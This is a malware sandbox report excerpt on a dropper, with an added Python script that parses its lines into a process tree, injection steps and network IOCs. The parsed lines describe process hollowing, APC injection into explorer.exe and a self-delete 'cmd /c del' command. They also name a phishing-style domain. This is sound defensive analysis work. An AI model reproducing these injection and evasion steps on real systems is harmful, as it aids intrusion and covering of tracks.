Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 5_2_009A419C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 5_2_009BEA44
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 5_2_009B4CB1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 5_2_009BE4A4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW, 5_2_009BE448
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 5_2_009B9D92
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free, 5_2_009A2703
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 5_2_009A2B81
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free, 5_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 5_2_009BE521
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 5_2_009BE799
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 5_2_009B8FA3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW, 5_2_009B9FDB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 5_2_009BA75F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW, 5_2_009B9F55
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_009A3663
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_009BE8C3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 6_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 6_2_009BE1D4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 6_2_009A1118
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 6_2_009B8969
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_009A419C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 6_2_009BEA44
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 6_2_009B4CB1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 6_2_009BE4A4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW, 6_2_009BE448
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_009B9D92
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free, 6_2_009A2703
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_009A2B81
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free, 6_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 6_2_009BE521
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 6_2_009BE799
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_009B8FA3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW, 6_2_009B9FDB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 6_2_009BA75F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: EnumSystemLocalesW, 6_2_009B9F55
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B00A3 cpuid 5_2_009B00A3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_009B161F
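The evasion section above is a flat list, but an analyst reads it as three things: the process chain (EQNEDT32.EXE spawns word.exe, which spawns dvukljmnr.exe, which re-executes itself, hollows wuapp.exe and injects into explorer.exe, after which wuapp.exe has cmd.exe delete the dropper), the cross-process injection steps (section unmapped, PE image written at 400000 starting with 4D5A, APC queued, thread context set) and the network IOCs that explorer.exe resolves and connects to. The script below is an added example, not part of the sandbox report or of Joe Sandbox's tooling: it parses a constructed subset of the raw report lines from this section (kept exactly as the page exports them, including the trailing "Jump to behavior" link text, which the parser discards) and reduces them to a process tree, a list of injection edges, the anti-debug checks and the IOCs. The MITRE ATT&CK labels in TECHNIQUES are the editor's own mapping of each sandbox verb and are not stated by the report; `str.removeprefix` requires Python 3.9 or later.

```python
"""Reduce Joe Sandbox behaviour lines to a process tree, injection edges and IOCs.

Added example, not part of the sandbox report. SAMPLE_LINES is a constructed subset
of the report lines above, embedded so the script runs offline; the ATT&CK labels in
TECHNIQUES are the editor's mapping (an assumption), not something the report states.
"""
import re
from collections import defaultdict, namedtuple

SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h] 6_2_00A126F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe Network Connect: 98.137.244.37 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.storyofsol.com
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Memory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe" Jump to behavior
"""

VERBS = ("Process created", "Domain query", "Network Connect", "Section unmapped", "Section loaded",
         "Memory written", "Thread APC queued", "Thread register set", "Process queried", "Code function")
TECHNIQUES = {  # editor's assumption: ATT&CK technique per sandbox verb
    "Section unmapped": "T1055.012 Process Hollowing (target image unmapped)",
    "Memory written": "T1055.012 Process Hollowing (PE written into target)",
    "Section loaded": "T1055 Process Injection (RWX section mapped into target)",
    "Thread APC queued": "T1055.004 APC Injection",
    "Thread register set": "T1055.003 Thread Execution Hijacking (SetThreadContext)",
    "Process queried": "T1622 Debugger Evasion (ProcessDebugPort query)",
    "Code function": "T1622 Debugger Evasion (PEB read via fs:[30h])",
}
Event = namedtuple("Event", "src verb rest")
LINE_RE = re.compile(r"^Source: (?P<src>.+?) (?P<verb>" + "|".join(map(re.escape, VERBS))
                     + r"): (?P<rest>.*?)(?: Jump to behavior)?$")
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?P<cmd>.*)$", re.IGNORECASE)

def parse(text):
    """One Event per 'Source: <process> <verb>: <detail>' line; the UI link text is dropped."""
    found = (LINE_RE.match(line.strip()) for line in text.strip().splitlines())
    return [Event(m["src"], m["verb"], m["rest"].strip()) for m in found if m]

def process_tree(events):
    """Parent image -> [(child image, command line)] from 'Process created' lines."""
    tree = defaultdict(list)
    for e in events:
        if e.verb == "Process created":
            m = IMAGE_RE.match(e.rest)  # image path ends at the first '.exe'
            tree[e.src].append((m["image"], m["cmd"].strip()))
    return dict(tree)

def roots(tree):
    """Parents never seen as a child here. A hollowed host (wuapp.exe) lands here because its
    creation is logged in another section; the injection edges tie it back to the injector."""
    children = {img for kids in tree.values() for img, _ in kids}
    return sorted(p for p in tree if p not in children)

def injection_edges(events):
    """(injector, technique, target, detail) for each cross-process write or execution step."""
    edges = []
    for e in events:
        if e.verb == "Section unmapped":
            target, _, detail = e.rest.partition(" base address: ")
        elif e.verb == "Section loaded":
            target, _, detail = e.rest.removeprefix("unknown target: ").partition(" protection: ")
        elif e.verb == "Memory written":
            target, _, detail = e.rest.partition(" base: ")
            if "4D5A" in detail:  # 'MZ': a whole PE image is being written, not a shellcode stub
                detail += " (full PE image)"
        elif e.verb in ("Thread APC queued", "Thread register set"):
            target, detail = e.rest.removeprefix("target process: "), "execution redirected"
        else:
            continue
        edges.append((e.src, TECHNIQUES[e.verb], target, detail))
    return edges

def evasion_indicators(events):
    """Anti-debug checks: direct PEB reads (fs:[30h]) and ProcessDebugPort queries."""
    hits = {(e.src, TECHNIQUES[e.verb]) for e in events
            if (e.verb == "Process queried" and "DebugPort" in e.rest)
            or (e.verb == "Code function" and "fs:[00000030h]" in e.rest)}
    return sorted(hits)

def network_iocs(events):
    """Domains resolved and (ip, port) pairs connected to, in report order."""
    domains = [e.rest for e in events if e.verb == "Domain query"]
    conns = [(ip, int(port)) for ip, port in
             (e.rest.split() for e in events if e.verb == "Network Connect")]
    return {"domains": domains, "connections": conns}

if __name__ == "__main__":
    ev = parse(SAMPLE_LINES)
    tree = process_tree(ev)
    print("roots:", roots(tree))
    print(*injection_edges(ev), *evasion_indicators(ev), network_iocs(ev), sep="\n")
```

On this input the tree has two roots, EQNEDT32.EXE and wuapp.exe: wuapp.exe is the hollowed host whose "Process created" line sits in a different section of the report, so only the "Section unmapped" edge from dvukljmnr.exe ties it to the chain. That is the general lesson of the example: sandbox process trees alone miss hollowed and APC-injected hosts, and the injection edges have to be joined to the tree before the explorer.exe network activity can be attributed to the dropper.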

Stealing of Sensitive Information

Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY